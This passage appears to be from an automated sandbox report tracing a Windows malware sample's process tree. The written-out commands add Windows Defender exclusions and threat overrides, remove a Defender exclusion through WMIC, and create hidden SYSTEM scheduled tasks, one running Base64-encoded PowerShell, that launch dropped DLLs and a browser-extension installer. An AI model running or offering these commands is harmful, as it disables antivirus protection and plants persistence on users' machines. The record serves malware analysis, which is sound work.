    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FzpuedLTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FzpuedLTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PcLiRWXpUzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PcLiRWXpUzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iCicfgLYntvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iCicfgLYntvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sXRDJszbtgBiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sXRDJszbtgBiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dtuHeAxmPKoTaGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dtuHeAxmPKoTaGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uNeWOBYAOfnJEVtb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\uNeWOBYAOfnJEVtb\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5792
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3564
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FzpuedLTU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5228
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FzpuedLTU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2176
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FzpuedLTU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcLiRWXpUzUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PcLiRWXpUzUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iCicfgLYntvU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iCicfgLYntvU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sXRDJszbtgBiC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sXRDJszbtgBiC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dtuHeAxmPKoTaGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5892
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dtuHeAxmPKoTaGVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3484
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1532
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\bCoCdKIDNDhgUGpvr /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\uNeWOBYAOfnJEVtb /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\uNeWOBYAOfnJEVtb /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gMHlzuEJp" /SC once /ST 11:32:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gMHlzuEJp"
  2⤵
  PID:2184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gMHlzuEJp"
  2⤵
  PID:1824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YvkvJxjCeChtPIXLC" /SC once /ST 03:41:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\uNeWOBYAOfnJEVtb\EzADZLModDRSLOY\KtercHi.exe\" 1h /ktsite_idoRN 757674 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4428
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "YvkvJxjCeChtPIXLC"
  2⤵
  PID:2288

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3008
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4728
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4428
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1864

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2176

C:\Windows\Temp\uNeWOBYAOfnJEVtb\EzADZLModDRSLOY\KtercHi.exe
C:\Windows\Temp\uNeWOBYAOfnJEVtb\EzADZLModDRSLOY\KtercHi.exe 1h /ktsite_idoRN 757674 /S
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bUgrpDbixCAhXFfIKo"
  2⤵
  PID:5080
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:1312
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5912
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:6232
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\FzpuedLTU\ssiIZv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wqpeDKIFfvabWBG" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:6304
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wqpeDKIFfvabWBG2" /F /xml "C:\Program Files (x86)\FzpuedLTU\YQUFrgK.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "wqpeDKIFfvabWBG"
  2⤵
  PID:1768
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wqpeDKIFfvabWBG"
  2⤵
  PID:5572
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ffpvuiTXBlhlsB" /F /xml "C:\Program Files (x86)\iCicfgLYntvU2\plfmxJn.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2364
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "irKiCKkbsMDfO2" /F /xml "C:\ProgramData\dtuHeAxmPKoTaGVB\gOtesuE.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6464
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xdsyBFoVwQPkXBqjn2" /F /xml "C:\Program Files (x86)\OeaNvgPtnMbXNNRkVbR\hVlUPOf.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2732
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xtUWuhMVLHkxmwtItzN2" /F /xml "C:\Program Files (x86)\sXRDJszbtgBiC\YAdbuJD.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "UtYEUTeMbpvFAhQGa" /SC once /ST 08:50:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\uNeWOBYAOfnJEVtb\wVMKHMOg\yIRgChW.dll\",#1 /Frsite_idJBH 757674" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:3052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "UtYEUTeMbpvFAhQGa"
  2⤵
  PID:3012
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "svxTN1" /SC once /ST 10:17:57 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"
  2⤵
  - Creates scheduled task(s)
  PID:5716
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "svxTN1"
  2⤵
  PID:5632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OUtWj1" /SC once /ST 01:56:19 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"
  2⤵
  - Creates scheduled task(s)
  PID:6600
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "OUtWj1"
  2⤵
  PID:6700
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OUtWj1"
  2⤵
  PID:4524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "svxTN1"
  2⤵
  PID:5844
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "YvkvJxjCeChtPIXLC"
  2⤵
  PID:3696

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\uNeWOBYAOfnJEVtb\wVMKHMOg\yIRgChW.dll",#1 /Frsite_idJBH 757674
1⤵
PID:3532
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\uNeWOBYAOfnJEVtb\wVMKHMOg\yIRgChW.dll",#1 /Frsite_idJBH 757674
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:652
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "UtYEUTeMbpvFAhQGa"
    3⤵
    PID:1160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:6588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaed19ab58,0x7ffaed19ab68,0x7ffaed19ab78
  2⤵
  PID:6612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1508 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:2
  2⤵
  PID:6172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:8
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1904 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:8
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2924 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:1
  2⤵
  PID:6224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3196 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3204 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:1
  2⤵
  PID:1556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4256 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:1
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4508 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:8
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3748 --field-trial-handle=2168,i,7964252475689245788,8689075472127745976,131072 /prefetch:8
  2⤵
  PID:5624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of SendNotifyMessage
PID:6808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaed043cb8,0x7ffaed043cc8,0x7ffaed043cd8
  2⤵
  PID:6780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2076 /prefetch:2
  2⤵
  PID:1688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:6396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,13130676213629418689,3005743982898276605,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
